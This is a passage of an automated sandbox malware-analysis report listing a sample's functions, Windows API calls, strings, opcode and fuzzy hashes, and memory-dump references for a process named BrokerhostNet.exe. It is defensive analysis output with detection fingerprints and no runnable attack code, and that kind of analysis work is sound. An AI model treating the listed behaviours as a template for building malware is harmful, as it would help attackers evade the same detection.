Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: __vswprintf_c_l_swprintf
String ID: %c:\
API String ID: 1543624204-3142399695
Opcode ID: 907c332f889f1bfdefea1448026223fd74a2a4c95c954c7def67a2a70a6ac9ff
Instruction ID: 5313f1ac1dfb16eb4ee7282c993fad7791d92bb1c3b5bcfdffe96d6c5fecd68a
Opcode Fuzzy Hash: 907c332f889f1bfdefea1448026223fd74a2a4c95c954c7def67a2a70a6ac9ff
Instruction Fuzzy Hash: 5E01D263500313A99A346B368C87E7BA7ACEF91770F44850FF584D7082EB70D84482B1

Function 00DD101F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00010000,00DD1160,?,00000000,00000000), ref: 00DD1043
SetThreadPriority.KERNEL32(?,00000000), ref: 00DD108A

Part of subcall function 00DC6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00DC6C54

Strings

CreateThread failed, xrefs: 00DD104F

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: Thread$CreatePriority__vswprintf_c_l
String ID: CreateThread failed
API String ID: 2655393344-3849766595
Opcode ID: 8917dab623f7483c9ef2cf7af450a0232d6edf06c19967900a0f8c2b9d021c57
Instruction ID: fcdbe38423c28f57b436903edabd68927d19830a0b0e7650c195f0643c0cbb1c
Opcode Fuzzy Hash: 8917dab623f7483c9ef2cf7af450a0232d6edf06c19967900a0f8c2b9d021c57
Instruction Fuzzy Hash: 1201D6B934430A7FD3306E68AD52F767398EB41751F24402FF686A63C0CEA1A8C48634

Function 00DC1316 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 00DCE2E8: _swprintf.LIBCMT ref: 00DCE30E
Part of subcall function 00DCE2E8: _strlen.LIBCMT ref: 00DCE32F
Part of subcall function 00DCE2E8: SetDlgItemTextW.USER32(?,00DFE274,?), ref: 00DCE38F
Part of subcall function 00DCE2E8: GetWindowRect.USER32(?,?), ref: 00DCE3C9
Part of subcall function 00DCE2E8: GetClientRect.USER32(?,?), ref: 00DCE3D5

GetDlgItem.USER32(00000000,00003021), ref: 00DC135A
SetWindowTextW.USER32(00000000,00DF35F4), ref: 00DC1370

Strings

0, xrefs: 00DC1319

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: ItemRectTextWindow$Client_strlen_swprintf
String ID: 0
API String ID: 2622349952-4108050209
Opcode ID: eb9bd80286dc1791e2fd4551f1b149c26bfc5c1d63bdfb14082ff82dc1bfe392
Instruction ID: 111e755253170898da95b5daec6492637c0f893c44036497f804a58754ae1d74
Opcode Fuzzy Hash: eb9bd80286dc1791e2fd4551f1b149c26bfc5c1d63bdfb14082ff82dc1bfe392
Instruction Fuzzy Hash: 1AF081341042DAAAEF150FA1880EFA93B58AB4134CF088319FC8466592CB78C995AA70

Function 00DE8268 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

Part of subcall function 00DEBF30: GetEnvironmentStringsW.KERNEL32 ref: 00DEBF39
Part of subcall function 00DEBF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00DEBF5C
Part of subcall function 00DEBF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00DEBF82
Part of subcall function 00DEBF30: _free.LIBCMT ref: 00DEBF95
Part of subcall function 00DEBF30: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00DEBFA4

_free.LIBCMT ref: 00DE82AE
_free.LIBCMT ref: 00DE82B5

Strings

0", xrefs: 00DE829B

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
String ID: 0"
API String ID: 400815659-420201205
Opcode ID: c6e5fb005896c602fc120e738a4b2830f150ba8b52e0a6c79faefe43ba81382e
Instruction ID: 9c49a4e019812ba79d6f00142600a6673932c35beb6d93592eca89b1a64abbde
Opcode Fuzzy Hash: c6e5fb005896c602fc120e738a4b2830f150ba8b52e0a6c79faefe43ba81382e
Instruction Fuzzy Hash: FBE06523A05DD2999661327B7C4266F0604CFC1338B59125AF7189B0D3DE50880265BA

Function 00DD0FE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,00DD1206,?), ref: 00DD0FEA
GetLastError.KERNEL32(?), ref: 00DD0FF6

Part of subcall function 00DC6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00DC6C54

Strings

WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00DD0FFF

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: ErrorLastObjectSingleWait__vswprintf_c_l
String ID: WaitForMultipleObjects error %d, GetLastError %d
API String ID: 1091760877-2248577382
Opcode ID: 0577bfcacb593452fa554de5002cebe8ad0e5395caafc72a0b9889862ac0eae8
Instruction ID: 012470a6e2f390cb68e04b1323ed2a89e3d55d28f6a6b50803850d653767fbb9
Opcode Fuzzy Hash: 0577bfcacb593452fa554de5002cebe8ad0e5395caafc72a0b9889862ac0eae8
Instruction Fuzzy Hash: B2D02B715042213AC61037246D06DBF3C04CB12731B158719F138A53E5CE1049C182B1

Function 00DCE29E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00DCDA55,?), ref: 00DCE2A3
FindResourceW.KERNEL32(00000000,RTL,00000005,?,00DCDA55,?), ref: 00DCE2B1

Strings

RTL, xrefs: 00DCE2AB

Memory Dump Source

Source File: 00000000.00000002.1763183414.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1763168846.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763210072.0000000000DF3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E05000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763229154.0000000000E22000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1763280792.0000000000E23000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_gkcQYEdJSO.jbxd

Similarity

API ID: FindHandleModuleResource
String ID: RTL
API String ID: 3537982541-834975271
Opcode ID: 849da451f6ca9aa430ac25e520ba275899f256d1060fc8e38eaa92919750484f
Instruction ID: cb6eed9c6dfcd8d861c4d2f67317bec9c6e213a18811ead90944f111fe65152c
Opcode Fuzzy Hash: 849da451f6ca9aa430ac25e520ba275899f256d1060fc8e38eaa92919750484f
Instruction Fuzzy Hash: D1C012312407106BEA302B656C0EFA3AA585B00B11F0B844EB282EA2D1DAA5C984CAB0

Analysis Process: BrokerhostNet.exePID: 7844, Parent PID: 7792COMMON

Executed Functions

Function 00007FFD9BAC0D4C Relevance: 1.5, Strings: 1, Instructions: 254COMMON

Download Yara Rule

Strings

5Y_H, xrefs: 00007FFD9BAC0DF3

Memory Dump Source

Source File: 00000007.00000002.2043207321.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9bac0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID: 5Y_H
API String ID: 0-3237497481
Opcode ID: 5d5e537a8e346e4fe46f7c12b64016cef558b957c109070c356b29ee01e8d354
Instruction ID: 5e85d4dc2562a2ca7199beb05f95dd545a39f4659b4b51380243f83e06c69498
Opcode Fuzzy Hash: 5d5e537a8e346e4fe46f7c12b64016cef558b957c109070c356b29ee01e8d354
Instruction Fuzzy Hash: 7491E371A19A8D8FE799DB6888757A87FE1FF5A314F4102FAD049C72E6CBB818118740

Function 00007FFD9BECA1EE Relevance: .4, Instructions: 379COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2055472559.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9beb0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e153d928ede68d3fcb5c1cc77bbc61a20f1a0c57655ac84e4a03ebedba7d48d7
Instruction ID: 03d4c3a059d9a5860c5303768bc90a6eac0febd7bff626189d1ccd11803a7845
Opcode Fuzzy Hash: e153d928ede68d3fcb5c1cc77bbc61a20f1a0c57655ac84e4a03ebedba7d48d7
Instruction Fuzzy Hash: 07C19030A09A4E8FEBA8EF68D8657F977D1FB54311F10823AD80DC7295DE35A9418B81

Function 00007FFD9BAC0B3F Relevance: 3.8, Strings: 3, Instructions: 54COMMON

Download Yara Rule

Strings

"s9, xrefs: 00007FFD9BAC0B46
c9, xrefs: 00007FFD9BAC0B56
!k9, xrefs: 00007FFD9BAC0B4E

Memory Dump Source

Source File: 00000007.00000002.2043207321.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9bac0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID: c9$!k9$"s9
API String ID: 0-3426396564
Opcode ID: 900da5ea9ff2a7847ee58da47453e6f5f5ec1c31a2910bd43295444dbdbf73e3
Instruction ID: 874f6bbd3b07c9d5a51330af21ae6bc675e894aa35a0a50884c814c834d1ebcd
Opcode Fuzzy Hash: 900da5ea9ff2a7847ee58da47453e6f5f5ec1c31a2910bd43295444dbdbf73e3
Instruction Fuzzy Hash: 5601D12776B95D8BC611AB3DB8500E8BB50EA83136B8603FBD844CB1A2E615185FC7D0

Function 00007FFD9BEBC098 Relevance: 1.4, Strings: 1, Instructions: 154COMMON

Download Yara Rule

Strings

, xrefs: 00007FFD9BEBC112

Memory Dump Source

Source File: 00000007.00000002.2055472559.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9beb0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 54934c8f343d5c314c1dc0dc7f58b62cea838f52699c792115aca2506fbae4cc
Instruction ID: 5dcbd722368705336b10e6dffebffcef33a113260b45b0ba11a6d5536328aa31
Opcode Fuzzy Hash: 54934c8f343d5c314c1dc0dc7f58b62cea838f52699c792115aca2506fbae4cc
Instruction Fuzzy Hash: 6B515831E0D65E8FDB69DB98C8615BDB7B5FF58300F1141BAD01AE73A2CA392A05CB50

Function 00007FFD9BEB2188 Relevance: 1.4, Strings: 1, Instructions: 128COMMON

Download Yara Rule

Strings

, xrefs: 00007FFD9BEB2202

Memory Dump Source

Source File: 00000007.00000002.2055472559.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9beb0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: b63becb7c8d556f43093194399e1f58cbeb770ab15964a8e2a7866af4fa37530
Instruction ID: e80b0c19ca5b5b5c585340b68e55852593efd2b4c4f8d371aa08f21f1a66ae22
Opcode Fuzzy Hash: b63becb7c8d556f43093194399e1f58cbeb770ab15964a8e2a7866af4fa37530
Instruction Fuzzy Hash: AF413730E0951E9FDB19DBD4D8655BDBBB1FF58300F1141AAD01AE72A6CA396A02CF40

Function 00007FFD9BEB71B8 Relevance: 1.4, Strings: 1, Instructions: 125COMMON

Download Yara Rule

Strings

, xrefs: 00007FFD9BEB7232

Memory Dump Source

Source File: 00000007.00000002.2055472559.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9beb0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 0b42e1f1bcbfb88ad31a18defcf209e6bb7af7e09c3f048114f5260fb8bcb313
Instruction ID: caabf23496af103a18c44915f2b00d6587a361ddf10323b7900df0a98f0fdbc5
Opcode Fuzzy Hash: 0b42e1f1bcbfb88ad31a18defcf209e6bb7af7e09c3f048114f5260fb8bcb313
Instruction Fuzzy Hash: 2B417930E0A61E9FDB19CFE4C8A15BDB7B5FF04300F1140B9D01AA76A2CA3A6A01CF54

Function 00007FFD9BEB23FF Relevance: .4, Instructions: 425COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2055472559.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9beb0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8c08341a196b9167d42ed4310a82a7596a9fefd99391838bb8e274e92c93fd9
Instruction ID: 587a6ecd6502d0b3ee63310ab430353729f16b1d686ccd3a51f58bab9cf326a2
Opcode Fuzzy Hash: f8c08341a196b9167d42ed4310a82a7596a9fefd99391838bb8e274e92c93fd9
Instruction Fuzzy Hash: 70F1F730A195698FEB59CF58D4E06B53BA1FF45300B5142BDC84ECB69BCA39E981CF81

Function 00007FFD9BEB241F Relevance: .3, Instructions: 339COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2055472559.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9beb0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb79333f31ffcda1338d831be2c2b0703abe435f0c37270c4a74b4e3a4c6320c
Instruction ID: adb5d846d828b08b1f1f089c7af54f803353917e6488472121d4fe3b8c2fad4a
Opcode Fuzzy Hash: bb79333f31ffcda1338d831be2c2b0703abe435f0c37270c4a74b4e3a4c6320c
Instruction Fuzzy Hash: 90C1F33061A56A8BEB1DCF98D0E05B13BA5FF45300B5146BDC85F8B69BCA38E542CF85

Function 00007FFD9BEB744F Relevance: .3, Instructions: 334COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2055472559.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9beb0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55002135dc96879c10b27456773f7ff23725f5446d830384be20b2a67b6f0510
Instruction ID: 5fb206aa98aaff539750ae4b22557fa2b718d5aab741cfee3262e1f0fa8b12c9
Opcode Fuzzy Hash: 55002135dc96879c10b27456773f7ff23725f5446d830384be20b2a67b6f0510
Instruction Fuzzy Hash: B3C1133061A56A8BEB1DCF49C0E05B137A5FF45301B5546BDC84B8BA9BCA38F981CF85

Function 00007FFD9BEB1CB2 Relevance: .3, Instructions: 329COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2055472559.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9beb0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ccc6e310eb599f52484db925675870bf0626b84c7bd8ef6154c60bd9394d857d
Instruction ID: d340289f61421ca891b944c0c43302850128f4b9c6fca4cd634fdfc573b401fa
Opcode Fuzzy Hash: ccc6e310eb599f52484db925675870bf0626b84c7bd8ef6154c60bd9394d857d
Instruction Fuzzy Hash: D9C10630B2DA4A8FE359DFA9C0A06B077A5FF59320F454179C04EC7A96CB29F951CB81

Function 00007FFD9BEBBBC2 Relevance: .3, Instructions: 306COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2055472559.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9beb0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5aaf3fa259a3c9a9f0b41e9e2ff00f0f9e6120991fa338254a68c15318c5a012
Instruction ID: 901739fcd921d258f8d6363e7ca53274758103b764140233da88b84a71d5c243
Opcode Fuzzy Hash: 5aaf3fa259a3c9a9f0b41e9e2ff00f0f9e6120991fa338254a68c15318c5a012
Instruction Fuzzy Hash: BBB1E334B0A94A8FE759DBA9C0B16B4B7A5FF18300F454179D04EC7AA6CB39F951CB80

Function 00007FFD9BEB742F Relevance: .3, Instructions: 295COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2055472559.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9beb0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f43ab31dd91b3a2c5ea82d7bd3e85b0e19c334fbd428a7fd31b886ec55dd168
Instruction ID: eb27bfb735809ed05b6232638a1459b3c55df6d72ff014ecde80cd0b06f7b45f
Opcode Fuzzy Hash: 7f43ab31dd91b3a2c5ea82d7bd3e85b0e19c334fbd428a7fd31b886ec55dd168
Instruction Fuzzy Hash: 9FB1D17061A6658FEB4DCF09C0E05B13BA5FF49311B5142BDC84A8B69BCB38E981CF85

Function 00007FFD9BEB6D4E Relevance: .3, Instructions: 295COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2055472559.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9beb0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97f3bdbea493234ea18ee50df10f225f5cf1188ed250bc839de81a8c7406a78c
Instruction ID: 7365277b03c013b89a1ba120836cfd06f6f081a4a55a5d29a57436052b89b8ab
Opcode Fuzzy Hash: 97f3bdbea493234ea18ee50df10f225f5cf1188ed250bc839de81a8c7406a78c
Instruction Fuzzy Hash: FCA1F530A0EA4A8FE759DF69C0A06B0B7A5FF15310F5541B9D04EC7AE6CB29F951CB80

Function 00007FFD9BEB4700 Relevance: .3, Instructions: 282COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2055472559.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9beb0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff046fcc42cf10b42fc8e00e9f91974d4d0d3e897f3edb266eb4eae26dbeeb0a
Instruction ID: 2ee8db048fd0c07012e0dff551fa580ca2fee155f3421117659668cd18264eae
Opcode Fuzzy Hash: ff046fcc42cf10b42fc8e00e9f91974d4d0d3e897f3edb266eb4eae26dbeeb0a
Instruction Fuzzy Hash: F9118152F0F1BF87F63511EB287117C59785F56725F1701BEE45E861F29C0E2A406B82

Function 00007FFD9BEB11E6 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2055472559.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9beb0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 711dc94c616ee7b027fed4cbda71ddb0abbb59a8898bc320b61ab3adf2632f41
Instruction ID: 30d3d3fc7d1179966ac37653d60e1009b5580c20e644644e302e5eea4fda4d6b
Opcode Fuzzy Hash: 711dc94c616ee7b027fed4cbda71ddb0abbb59a8898bc320b61ab3adf2632f41
Instruction Fuzzy Hash: B7819C31B1E65A4FE33C9AA9946547577D4EF81331B16017ED48FC31A2DE2ABA028B43

Function 00007FFD9BEB6216 Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2055472559.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9beb0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a71c60476cecba615bba15c6a40680eafb344e5f4ecb4a08d5b3ed42b40e9dbd
Instruction ID: 03c61f228e5c4769379026db44bcfa517c9290e6b670ccfd8d187cc8b9a0e9d6
Opcode Fuzzy Hash: a71c60476cecba615bba15c6a40680eafb344e5f4ecb4a08d5b3ed42b40e9dbd
Instruction Fuzzy Hash: A3816C32B0EA5A4FF33C9A999461174B7E4FF91315B15017ED08EC31E2DD2AF9028B41

Function 00007FFD9BEB4379 Relevance: .3, Instructions: 256COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2055472559.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9beb0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c32fef6f4bd6f60a3e3c87c6a64030bdb94f8448f33717de3986aac251796ce
Instruction ID: bebfdce64cdb8967145dcd77c8c34e8b764f366bd0fafcf58a31e66498418c85
Opcode Fuzzy Hash: 0c32fef6f4bd6f60a3e3c87c6a64030bdb94f8448f33717de3986aac251796ce
Instruction Fuzzy Hash: E9717A31B0E46D4FE77CDA5998365B437E4FF44310B1202BDD09EC75B2DE1AAA268B81

Function 00007FFD9BEB9239 Relevance: .3, Instructions: 255COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2055472559.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9beb0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0c54e6bbf783ba8ca8d77627a36e31cbb8a5deeaa591f9651f8458572742963
Instruction ID: 8f4690fc82b104ec95c64efa96b8ee8bee9fbfed7ed7815dae7a5e7be844eeb7
Opcode Fuzzy Hash: b0c54e6bbf783ba8ca8d77627a36e31cbb8a5deeaa591f9651f8458572742963
Instruction Fuzzy Hash: 1671BF3AB0E45D4FE778DA59886E4B437C4FF84311B1602B9D05EC75F2DE1AEA068B81

Function 00007FFD9BEB3441 Relevance: .2, Instructions: 196COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2055472559.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9beb0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: faa1cac38e0be42eb8e36740b844302d260acce5748268d9f7fa30e49b3a6bec
Instruction ID: c2f499a207bef8fc9ee321d61fb78e4bef10c13447fff0fd737fa05cca285b20
Opcode Fuzzy Hash: faa1cac38e0be42eb8e36740b844302d260acce5748268d9f7fa30e49b3a6bec
Instruction Fuzzy Hash: 63711730B0AB5A8FE36ADF55D1A257177E1FF44310B41157EC08EC3AA6CB2AB941CB41

Function 00007FFD9BEB8471 Relevance: .2, Instructions: 196COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2055472559.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9beb0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5213ca40279729979fa0bb8aa40034697886ed5981f3fc448dabe749485dec15
Instruction ID: ad91be796a2b0b59d7a18b5ea922c41406bf6b64efa01689de040946feaa97dd
Opcode Fuzzy Hash: 5213ca40279729979fa0bb8aa40034697886ed5981f3fc448dabe749485dec15
Instruction Fuzzy Hash: FD71F230A0AB1E8FE368DB65C4A457177E1FF44304B41557DC09AC3BA6DA2AB842CF80

Function 00007FFD9BEBB241 Relevance: .1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2055472559.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9beb0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fe2ab6862f8ad968f07110d2634b3641ad11e8b2e8740bd6a1d1ca3aa193964
Instruction ID: e742841d4d04d126115e80695cd6893dd47079035e9a09b0af9b8db49703de55
Opcode Fuzzy Hash: 6fe2ab6862f8ad968f07110d2634b3641ad11e8b2e8740bd6a1d1ca3aa193964
Instruction Fuzzy Hash: CB313636F1E6198BF37899B9686607973C8EF56311B12053EE4CFC31A2D91AB6034B46

Function 00007FFD9BAC08E8 Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2043207321.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9bac0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c3699f8532241432373f4e76d1a7e9a9ced952f9e3f9830734c06a5f91736dc
